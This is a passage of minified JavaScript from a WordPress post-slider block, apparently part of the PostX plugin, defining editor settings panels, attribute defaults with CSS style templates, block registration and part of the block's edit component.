Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,exSettings:["metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exSettings:["catPosition"],exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exSettings:["imgWidth","imgHeight","imageScale","imgMargin","imgSeparator","imgCropSmall","imgAnimation"],exStyle:["imgWidth","imgHeight","imageScale","imgMargin","imgSeparator","imgCropSmall","imgAnimation"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},48161:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},slidesToShow:{type:"object",default:{lg:"1",sm:"1",xs:"1"}},autoPlay:{type:"boolean",default:!0},height:{type:"object",default:{lg:"550",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-image,  \n          {{ULTP}} .ultp-block-slider-wrap { height: {{height}}; }"}]},slideSpeed:{type:"string",default:"3000",style:[{depends:[{key:"autoPlay",condition:"==",value:!0}]}]},sliderGap:{type:"string",default:"10",style:[{selector:"{{ULTP}} .ultp-block-items-wrap .slick-slide > div { padding: 0 {{sliderGap}}px; line-height: 0px; }\n          {{ULTP}} .ultp-block-items-wrap .slick-list { margin: 0 -{{sliderGap}}px; }"}]},dots:{type:"boolean",default:!0},arrows:{type:"boolean",default:!0},preLoader:{type:"boolean",default:!1},fade:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"#0e1523",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"#037fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"28",unit:"px"},height:{lg:"36",unit:"px"},decoration:"none",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-block-content .ultp-block-title,  \n          {{ULTP}} .ultp-block-item .ultp-block-content .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:25,bottom:12,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},imageShow:{type:"boolean",default:!0},imgCrop:{type:"string",default:"full"},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{selector:"{{ULTP}} .ultp-block-image img { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},fallbackEnable:{type:"boolean",default:!0},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:40,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"#777",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt,  \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:26,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt,  \n          {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:10,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},arrowStyle:{type:"string",default:"leftAngle2#rightAngle2",style:[{depends:[{key:"arrows",condition:"==",value:!0}]}]},arrowSize:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-next svg,  \n          {{ULTP}} .slick-prev svg { width:{{arrowSize}}; }"}]},arrowWidth:{type:"object",default:{lg:"60",unit:"px"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow { width:{{arrowWidth}}; }"}]},arrowHeight:{type:"object",default:{lg:"60",unit:"px"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow { height:{{arrowHeight}}; }  \n          {{ULTP}} .slick-arrow { line-height:{{arrowHeight}}; }"}]},arrowVartical:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-next { right:{{arrowVartical}}; }  \n          {{ULTP}} .slick-prev { left:{{arrowVartical}}; }"}]},arrowColor:{type:"string",default:"#037fff",style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:before { color:{{arrowColor}}; }  \n          {{ULTP}} .slick-arrow svg { color:{{arrowColor}}; }"}]},arrowHoverColor:{type:"string",default:"#fff",style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover:before { color:{{arrowHoverColor}}; }  \n          {{ULTP}} .slick-arrow:hover svg { color:{{arrowHoverColor}}; }"}]},arrowBg:{type:"string",default:"#fff",style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow { background:{{arrowBg}}; }"}]},arrowHoverBg:{type:"string",default:"#037fff",style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover { background:{{arrowHoverBg}}; }"}]},arrowBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow"}]},arrowHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover"}]},arrowRadius:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow { border-radius: {{arrowRadius}}; }"}]},arrowHoverRadius:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover { border-radius: {{arrowHoverRadius}}; }"}]},arrowShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow"}]},arrowHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover"}]},dotWidth:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button { width:{{dotWidth}}; }"}]},dotHeight:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button { height:{{dotHeight}}; }"}]},dotHoverWidth:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li.slick-active button { width:{{dotHoverWidth}}; }"}]},dotHoverHeight:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li.slick-active button { height:{{dotHoverHeight}}; }"}]},dotSpace:{type:"object",default:{lg:"4",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots { padding: 0 {{dotSpace}}; }  \n          {{ULTP}} .slick-dots li button { margin: 0 {{dotSpace}}; }"}]},dotVartical:{type:"object",default:{lg:"40",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots { bottom:{{dotVartical}}; }"}]},dotHorizontal:{type:"object",default:{lg:""},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots { left:{{dotHorizontal}}; }"}]},dotBg:{type:"string",default:"#f5f5f5",style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button { background:{{dotBg}}; }"}]},dotHoverBg:{type:"string",default:"#000",style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button:hover,  \n          {{ULTP}} .slick-dots li.slick-active button { background:{{dotHoverBg}}; }"}]},dotBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button"}]},dotHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button:hover,  \n          {{ULTP}} .slick-dots li.slick-active button"}]},dotRadius:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button { border-radius: {{dotRadius}}; }"}]},dotHoverRadius:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button:hover,  \n          {{ULTP}} .slick-dots li.slick-active button { border-radius: {{dotHoverRadius}}; }"}]},dotShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button"}]},dotHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button:hover,  \n          {{ULTP}} .slick-dots li.slick-active button"}]},contentVerticalPosition:{type:"string",default:"middlePosition",style:[{depends:[{key:"contentVerticalPosition",condition:"==",value:"topPosition"}],selector:"{{ULTP}} .ultp-block-content-topPosition { align-items:flex-start; }"},{depends:[{key:"contentVerticalPosition",condition:"==",value:"middlePosition"}],selector:"{{ULTP}} .ultp-block-content-middlePosition { align-items:center; }"},{depends:[{key:"contentVerticalPosition",condition:"==",value:"bottomPosition"}],selector:"{{ULTP}} .ultp-block-content-bottomPosition { align-items:flex-end; }"}]},contentHorizontalPosition:{type:"string",default:"centerPosition",style:[{depends:[{key:"contentHorizontalPosition",condition:"==",value:"leftPosition"}],selector:"{{ULTP}} .ultp-block-content-leftPosition { justify-content:flex-start; }"},{depends:[{key:"contentHorizontalPosition",condition:"==",value:"centerPosition"}],selector:"{{ULTP}} .ultp-block-content-centerPosition { justify-content:center; }"},{depends:[{key:"contentHorizontalPosition",condition:"==",value:"rightPosition"}],selector:"{{ULTP}} .ultp-block-content-rightPosition { justify-content:flex-end; }"}]},contentAlign:{type:"string",default:"center",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content-inner { text-align:{{contentAlign}}; }  \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content-inner { text-align:{{contentAlign}}; }  \n          {{ULTP}} .ultp-block-meta { justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content-inner { text-align:{{contentAlign}}; }  \n          {{ULTP}} .ultp-block-meta { justify-content: flex-end; }"}]},contenWraptWidth:{type:"object",default:{lg:"60",unit:"%"},style:[{selector:"{{ULTP}} .ultp-block-content-inner { width:{{contenWraptWidth}}; }"}]},contenWraptHeight:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} .ultp-block-content-inner { height:{{contenWraptHeight}}; }"}]},contentWrapBg:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-block-content-inner { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",style:[{selector:"{{ULTP}} .ultp-block-content-inner:hover { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-inner"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-inner:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:"6",bottom:"6",left:"6",right:"6",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner{ border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"10",bottom:"10",left:"10",right:"10",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner:hover{ border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:0,right:5,bottom:15,left:0},color:"rgba(0,0,0,0.15)"},style:[{selector:"{{ULTP}} .ultp-block-content-inner"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:0,right:10,bottom:25,left:0},color:"rgba(0,0,0,0.25)"},style:[{selector:"{{ULTP}} .ultp-block-content-inner:hover"}]},contentWrapPadding:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner { padding: {{contentWrapPadding}}; }"}]},contentMargin:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner { margin: {{contentMargin}}; }"}]},headingShow:{type:"boolean",default:!1},headingText:{type:"string",default:"Post Slider #1"},...(0,o.t)(["advanceAttr","heading","meta","category","readMore","query"],[],[{key:"queryNumPosts",default:{lg:5}},{key:"queryNumber",default:5},{key:"metaSeparator",default:"dash"},{key:"metaColor",default:"#989898"},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"catSacing",default:{lg:{top:-65,bottom:5,left:0,right:0,unit:"px"}}},{key:"catPadding",default:{lg:{top:8,bottom:6,left:16,right:16,unit:"px"}}},{key:"readMore",default:!0},{key:"readMoreColor",default:"#000"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"#037fff"}},{key:"readMoreHoverColor",default:"#037fff"},{key:"readMoreBgHoverColor",default:{openColor:0,type:"color",color:"#0c32d8"}},{key:"readMoreSacing",default:{lg:{top:30,bottom:"",left:"",right:"",unit:"px"}}},{key:"readMorePadding",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}}}]),V4_1_0_CompCheck:a.O,...(0,i.b)()}},5930:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(40181),n=l(48161),r=l(74384);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-slider-1/","block_docs"),s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-slider-1.svg"}),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postslider1.svg"}},edit:i.Z,save:()=>null})},73504:(e,t,l)=>{"use strict";l.d(t,{Z:()=>M});var o=l(67294),a=l(46066),i=l(25335),n=l(53049),r=l(73151),s=l(23890),p=l(49491),c=l(29236),u=l(46896),d=l(8152),m=l(76005),g=l(99838),y=l(69735),b=l(2963),v=l(39349),h=l(87025),f=l(31760),k=l(83100),w=l(64766),x=l(34047);const{__}=wp.i18n,{InspectorControls:T,useBlockProps:_}=wp.blockEditor,{useEffect:C,useState:E,useRef:S,Fragment:P}=wp.element,{Spinner:L,Placeholder:I}=wp.components,{getBlockAttributes:B,getBlockRootClientId:U}=wp.data.select("core/block-editor");function M(e){const t=S(null),[l,M]=E(h.Ti),[A,H]=E(null),{setAttributes:N,className:j,clientId:Z,name:O,attributes:R,isSelected:D,context:z,attributes:{blockId:F,imageShow:W,imgCrop:V,readMoreIcon:G,arrowStyle:q,arrows:$,fade:K,dots:J,slideSpeed:Y,autoPlay:X,readMore:Q,readMoreText:ee,excerptLimit:te,metaStyle:le,catShow:oe,metaSeparator:ae,titleShow:ie,catStyle:ne,catPosition:re,titlePosition:se,excerptShow:pe,metaList:ce,metaShow:ue,headingShow:de,headingStyle:me,headingAlign:ge,headingURL:ye,headingText:be,headingBtnText:ve,subHeadingShow:he,subHeadingText:fe,metaPosition:ke,imgOverlay:we,imgOverlayType:xe,contentVerticalPosition:Te,contentHorizontalPosition:_e,showFullExcerpt:Ce,customCatColor:Ee,onlyCatColor:Se,contentTag:Pe,titleTag:Le,showSeoMeta:Ie,titleLength:Be,metaMinText:Ue,metaAuthorPrefix:Me,titleStyle:Ae,metaDateFormat:He,slidesToShow:Ne,authorLink:je,layout:Ze,sliderGap:Oe,contenWraptHeight:Re,catBgColor:De,catPadding:ze,dotVartical:Fe,dotRadius:We,slidesCenterPadding:Ve,fallbackEnable:Ge,headingTag:qe,notFoundMessage:$e,dcEnabled:Ke,dcFields:Je,previewImg:Ye,advanceId:Xe,V4_1_0_CompCheck:{runComp:Qe},currentPostId:et,blockPubDate:tt}}=e;function lt(e){M({...l,selectedDC:e})}function ot(){M({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function at(e){M({...l,section:{...h.ZQ,[e]:!0}}),(0,h.Rt)(e),(0,h.ob)(e),H("setting")}function it(e){M((t=>({...t,toolbarSettings:e}))),(0,h.os)(e)}function nt(){l.error&&M({...l,error:!1}),l.loading||M({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,n.Ld)(R)}).then((e=>{M({...l,postsList:e,loading:!1})})).catch((e=>{M({...l,loading:!1,error:!0})}))}function rt(e,t){e.stopPropagation(),at("arrow"),it("arrow"),t()}C((()=>{(0,h.oA)(),nt()}),[]),C((()=>{const t=Z.substr(0,6),l=B(U(Z));(0,r.h)(e),(0,n.qi)(N,l,et,Z),"empty"==tt&&N({blockPubDate:(new Date).toISOString()}),F?F&&F!=t&&(l?.hasOwnProperty("ref")||(0,n.k0)()||l?.hasOwnProperty("theme")||N({blockId:t})):(N({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&N({queryType:"archiveBuilder"}))}),[Z]),C((()=>{const e=t.current;(0,y.o6)()&&0===R.dcFields.length&&N({dcFields:Array(x.PR).fill(void 0)}),e?((0,n.Qr)(e,R)&&(nt(),t.current=R),e.isSelected!==D&&D&&(0,h.gT)(at,it)):t.current=R}),[R]);const st={settingTab:A,setSettingTab:H,setAttributes:N,name:O,attributes:R,setSection:at,section:l.section,clientId:Z,context:z,setSelectedDc:lt,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){lt(e),it("dc_group")}};let pt;if(F&&(pt=(0,g.Kh)(R,"ultimate-post/post-slider-2",F,(0,n.k0)())),Ye)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Ye});const ct=(0,k.Z)("","slider_2",ultp_data.affiliate_id),ut=_({...Xe&&{id:Xe},className:`ultp-block-${F} ${j}`,onClick:e=>{e.stopPropagation(),at("general"),it("")}});return(0,o.createElement)(P,null,(0,o.createElement)(x.FP,{store:st,selected:l.toolbarSettings}),(0,o.createElement)(f.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"feat_toggle",label:__("Slider Features","ultimate-post"),data:n.$m,new:n.KE,[Qe?"exclude":"dep"]:n.N2}],store:st}),(0,o.createElement)(T,null,(0,o.createElement)(x.ZP,{store:st})),(0,o.createElement)("div",ut,pt&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:pt}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-pro-helper"},(0,o.createElement)("div",{className:"ultp-pro-helper__upgrade"},(0,o.createElement)("span",null,"To Unlock Slider 